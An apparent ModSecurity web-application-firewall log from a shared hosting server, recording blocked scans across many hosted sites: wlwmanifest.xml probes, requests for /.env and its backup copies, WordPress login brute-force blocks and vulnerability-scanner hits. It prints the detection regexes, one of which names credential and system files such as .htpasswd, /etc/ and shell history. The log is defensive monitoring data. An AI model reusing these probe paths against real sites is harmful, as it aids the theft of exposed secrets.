[Tue May 26 19:15:46.641795 2026] [security2:error] [pid 26857:tid 27086] [client 45.92.1.242:62188] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCtfoqtHEG_e9i6GyRgAAAOg"]
[Tue May 26 19:15:46.933589 2026] [security2:error] [pid 26857:tid 27017] [client 45.92.1.242:50726] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWkCtfoqtHEG_e9i6GyVAAAAKM"]
[Tue May 26 19:15:47.231984 2026] [security2:error] [pid 26857:tid 27006] [client 45.92.1.242:50655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWkC9foqtHEG_e9i6GyagAAAJg"]
[Tue May 26 19:15:47.543685 2026] [security2:error] [pid 26857:tid 27039] [client 45.92.1.242:53721] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWkC9foqtHEG_e9i6GyegAAALk"]
[Tue May 26 19:15:47.831972 2026] [security2:error] [pid 26857:tid 27062] [client 45.92.1.242:56107] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWkC9foqtHEG_e9i6GyigAAANA"]
[Tue May 26 19:15:48.137137 2026] [security2:error] [pid 26857:tid 27055] [client 45.92.1.242:65416] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "composer.dezka.mx"] [uri "/cgi-sys/suspendedpage.cgi/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWkDNfoqtHEG_e9i6GyoQAAAMk"]
[Tue May 26 19:15:48.689432 2026] [security2:error] [pid 26857:tid 26991] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkDNfoqtHEG_e9i6GyqAAAAIk"]
[Tue May 26 19:15:50.042736 2026] [security2:error] [pid 26857:tid 27052] [client 5.35.37.26:54198] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWkDtfoqtHEG_e9i6GzBwAAAMY"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 19:15:50.042852 2026] [security2:error] [pid 26857:tid 27052] [client 5.35.37.26:54198] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWkDtfoqtHEG_e9i6GzBwAAAMY"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 19:15:50.343584 2026] [security2:error] [pid 26857:tid 27080] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkDdfoqtHEG_e9i6Gy_wAAAOI"]
[Tue May 26 19:15:50.632804 2026] [security2:error] [pid 26857:tid 27064] [client 5.35.37.26:54231] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWkDtfoqtHEG_e9i6GzJgAAANI"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 19:15:50.632907 2026] [security2:error] [pid 26857:tid 27064] [client 5.35.37.26:54231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWkDtfoqtHEG_e9i6GzJgAAANI"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 19:15:52.476988 2026] [security2:error] [pid 26857:tid 27059] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkENfoqtHEG_e9i6GziQAAAM0"]
[Tue May 26 19:15:54.145120 2026] [security2:error] [pid 26857:tid 27072] [client 146.174.189.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkEdfoqtHEG_e9i6Gz3wAAANo"]
[Tue May 26 19:15:54.314128 2026] [security2:error] [pid 26857:tid 27026] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkEdfoqtHEG_e9i6Gz6wAAAKw"]
[Tue May 26 19:15:54.701302 2026] [security2:error] [pid 26857:tid 27025] [client 146.56.204.198:64601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "proxuber.com"] [uri "/admin/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahWkEtfoqtHEG_e9i6G0EwAAAKs"]
[Tue May 26 19:15:55.655118 2026] [security2:error] [pid 26857:tid 27083] [client 138.219.123.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWkE9foqtHEG_e9i6G0SgAAAOU"], referer: https://www.anujtradingco.com/
[Tue May 26 19:15:55.672410 2026] [security2:error] [pid 26857:tid 27099] [client 45.45.237.225:33212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env"] [unique_id "ahWkE9foqtHEG_e9i6G0UgAAAPU"]
[Tue May 26 19:15:55.744694 2026] [security2:error] [pid 26857:tid 27005] [client 45.45.237.225:33212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grcorp.in"] [uri "/.env.development"] [unique_id "ahWkE9foqtHEG_e9i6G0XAAAAJc"]
[Tue May 26 19:15:55.744850 2026] [security2:error] [pid 26857:tid 27005] [client 45.45.237.225:33212] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/.env.development"] [unique_id "ahWkE9foqtHEG_e9i6G0XAAAAJc"]
[Tue May 26 19:15:55.776428 2026] [security2:error] [pid 26857:tid 27111] [client 45.45.237.225:33228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env.bak"] [unique_id "ahWkE9foqtHEG_e9i6G0XQAAAQE"]
[Tue May 26 19:15:55.779655 2026] [security2:error] [pid 26857:tid 27034] [client 45.45.237.225:33204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/.env.backup"] [unique_id "ahWkE9foqtHEG_e9i6G0XgAAALQ"]
[Tue May 26 19:15:55.848928 2026] [security2:error] [pid 26857:tid 27059] [client 45.45.237.225:33228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grcorp.in"] [uri "/sitemap.xml"] [unique_id "ahWkE9foqtHEG_e9i6G0YwAAAM0"]
[Tue May 26 19:15:55.849061 2026] [security2:error] [pid 26857:tid 27059] [client 45.45.237.225:33228] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/sitemap.xml"] [unique_id "ahWkE9foqtHEG_e9i6G0YwAAAM0"]
[Tue May 26 19:15:55.950169 2026] [security2:error] [pid 26857:tid 27102] [client 45.45.237.225:33340] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grcorp.in"] [uri "/firebase.json"] [unique_id "ahWkE9foqtHEG_e9i6G0cQAAAPg"]
[Tue May 26 19:15:55.950279 2026] [security2:error] [pid 26857:tid 27102] [client 45.45.237.225:33340] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grcorp.in"] [uri "/firebase.json"] [unique_id "ahWkE9foqtHEG_e9i6G0cQAAAPg"]
[Tue May 26 19:15:56.674708 2026] [security2:error] [pid 26857:tid 27104] [client 138.219.123.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWkFNfoqtHEG_e9i6G0ogAAAPo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 19:15:57.678970 2026] [security2:error] [pid 26857:tid 27015] [client 178.20.210.57:18134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahWkE9foqtHEG_e9i6G0WwAAoSo"]
[Tue May 26 19:15:58.146926 2026] [security2:error] [pid 26857:tid 27091] [client 178.20.210.57:18134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahWkFdfoqtHEG_e9i6G08AAA7Uw"]
[Tue May 26 19:15:58.224853 2026] [security2:error] [pid 26857:tid 27042] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkFdfoqtHEG_e9i6G05gAAALw"]
[Tue May 26 19:15:58.491620 2026] [security2:error] [pid 26857:tid 27081] [client 207.180.11.90:14904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.osmsi.org.in"] [uri "/images/osm_star.gif"] [unique_id "ahWkFtfoqtHEG_e9i6G1DwAAAOM"]
[Tue May 26 19:15:58.537881 2026] [security2:error] [pid 26857:tid 27013] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkFtfoqtHEG_e9i6G0_wAAAJ8"]
[Tue May 26 19:16:00.533458 2026] [security2:error] [pid 26857:tid 27078] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkGNfoqtHEG_e9i6G1ZAAAAOA"]
[Tue May 26 19:16:02.015286 2026] [security2:error] [pid 26857:tid 27042] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkGdfoqtHEG_e9i6G1swAAALw"]
[Tue May 26 19:16:03.651379 2026] [security2:error] [pid 26857:tid 26865] [remote 5.42.158.148:56448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkG9foqtHEG_e9i6G2FwAAvgc"]
[Tue May 26 19:16:04.423004 2026] [security2:error] [pid 26857:tid 27042] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkG9foqtHEG_e9i6G2NAAAALw"]
[Tue May 26 19:16:06.667527 2026] [security2:error] [pid 26857:tid 27004] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkHtfoqtHEG_e9i6G2pAAAAJY"]
[Tue May 26 19:16:07.574006 2026] [security2:error] [pid 26857:tid 26903] [remote 74.7.241.58:46784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWkH9foqtHEG_e9i6G2xgAAly0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/rainadelproperties.com
[Tue May 26 19:16:08.254397 2026] [security2:error] [pid 26857:tid 27019] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkH9foqtHEG_e9i6G26AAAAKU"]
[Tue May 26 19:16:10.016993 2026] [security2:error] [pid 26857:tid 27070] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkIdfoqtHEG_e9i6G3RQAAANg"]
[Tue May 26 19:16:12.525603 2026] [security2:error] [pid 26857:tid 26943] [remote 92.205.109.21:54504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkJNfoqtHEG_e9i6G32gAAylU"]
[Tue May 26 19:16:12.697663 2026] [security2:error] [pid 26857:tid 27008] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkJNfoqtHEG_e9i6G30wAAAJo"]
[Tue May 26 19:16:12.837210 2026] [security2:error] [pid 26857:tid 26868] [remote 92.205.109.21:54504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkJNfoqtHEG_e9i6G37QAAvwo"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:16:14.365376 2026] [security2:error] [pid 26857:tid 26862] [remote 198.38.81.14:40288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWkJtfoqtHEG_e9i6G4OwAAwAQ"]
[Tue May 26 19:16:14.729167 2026] [security2:error] [pid 26857:tid 27071] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkJtfoqtHEG_e9i6G4RgAAANk"]
[Tue May 26 19:16:16.052820 2026] [security2:error] [pid 26857:tid 27094] [client 213.35.106.232:63694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWkJ9foqtHEG_e9i6G4jgAAAPA"]
[Tue May 26 19:16:16.698952 2026] [security2:error] [pid 26857:tid 27080] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkKNfoqtHEG_e9i6G4sAAAAOI"]
[Tue May 26 19:16:17.970123 2026] [security2:error] [pid 26857:tid 27080] [client 213.35.106.232:64090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWkKdfoqtHEG_e9i6G5BQAAAOI"]
[Tue May 26 19:16:18.731845 2026] [security2:error] [pid 26857:tid 26994] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkKtfoqtHEG_e9i6G5IgAAAIw"]
[Tue May 26 19:16:18.749159 2026] [security2:error] [pid 26857:tid 27069] [client 213.35.106.232:64329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahWkKtfoqtHEG_e9i6G5PQAAANc"]
[Tue May 26 19:16:19.473863 2026] [security2:error] [pid 26857:tid 27049] [client 213.35.106.232:64471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahWkK9foqtHEG_e9i6G5bgAAAMM"]
[Tue May 26 19:16:19.536051 2026] [security2:error] [pid 26857:tid 27084] [client 90.222.126.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkK9foqtHEG_e9i6G5VQAAAOY"]
[Tue May 26 19:16:20.354243 2026] [security2:error] [pid 26857:tid 26935] [remote 217.112.89.35:59316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkLNfoqtHEG_e9i6G5kwAApU0"]
[Tue May 26 19:16:21.012718 2026] [security2:error] [pid 26857:tid 26938] [remote 217.112.89.35:59316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkLNfoqtHEG_e9i6G5vgAA8VA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:16:21.142543 2026] [security2:error] [pid 26857:tid 27066] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkLNfoqtHEG_e9i6G5rQAAANQ"]
[Tue May 26 19:16:21.382375 2026] [security2:error] [pid 26857:tid 27037] [client 213.35.106.232:64599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahWkLdfoqtHEG_e9i6G5zwAAALc"]
[Tue May 26 19:16:22.120112 2026] [security2:error] [pid 26857:tid 27096] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkLdfoqtHEG_e9i6G53gAAAPI"]
[Tue May 26 19:16:22.258390 2026] [security2:error] [pid 26857:tid 27058] [client 213.35.106.232:64943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahWkLtfoqtHEG_e9i6G5_gAAAMw"]
[Tue May 26 19:16:22.856314 2026] [security2:error] [pid 26857:tid 27055] [client 138.84.72.193:10132] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWkLdfoqtHEG_e9i6G55QAAAMk"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:16:23.087806 2026] [security2:error] [pid 26857:tid 27101] [client 213.35.106.232:65079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahWkL9foqtHEG_e9i6G6IQAAAPc"]
